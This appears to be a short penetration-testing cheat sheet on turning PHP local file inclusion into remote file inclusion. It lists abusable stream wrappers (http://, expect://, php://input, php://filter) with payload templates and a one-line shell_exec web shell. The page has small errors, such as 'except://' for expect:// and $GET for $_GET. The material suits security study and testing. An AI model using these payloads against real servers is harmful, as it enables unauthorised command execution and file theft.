# Turning LFI into RFI

### PHP http\:// Wrapper

This allows you to access URLS

```
http://[path-to-remote-file]
```

Starting a simple python server we can attempt to gain the file as so: 

![Doesn't work](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MKe7Dg_IUw7eiCpwQiw%2F-MKeIU5lksGbw1QViUgx%2Fimage.png?alt=media\&token=f5f596ea-157b-4eee-9001-b6ed082748a5)

### HTTP except:// Wrapper

This wrapper allows you to run system commands. Its syntax is: 

```
except://[command]
```

### HTTP input:// Wrapper

This allows you to read raw data from the request body, this uses post data

```
php://input&cmd=[command]
```

post data syntax

```
<?php echo shell_exec($GET['cmd']); ?>
```

### PHP filter:// Wrapper

This wrapper converts the page into base64 and outputs it

```
php://filter/convert.base64-encode/resource=[file-name]
```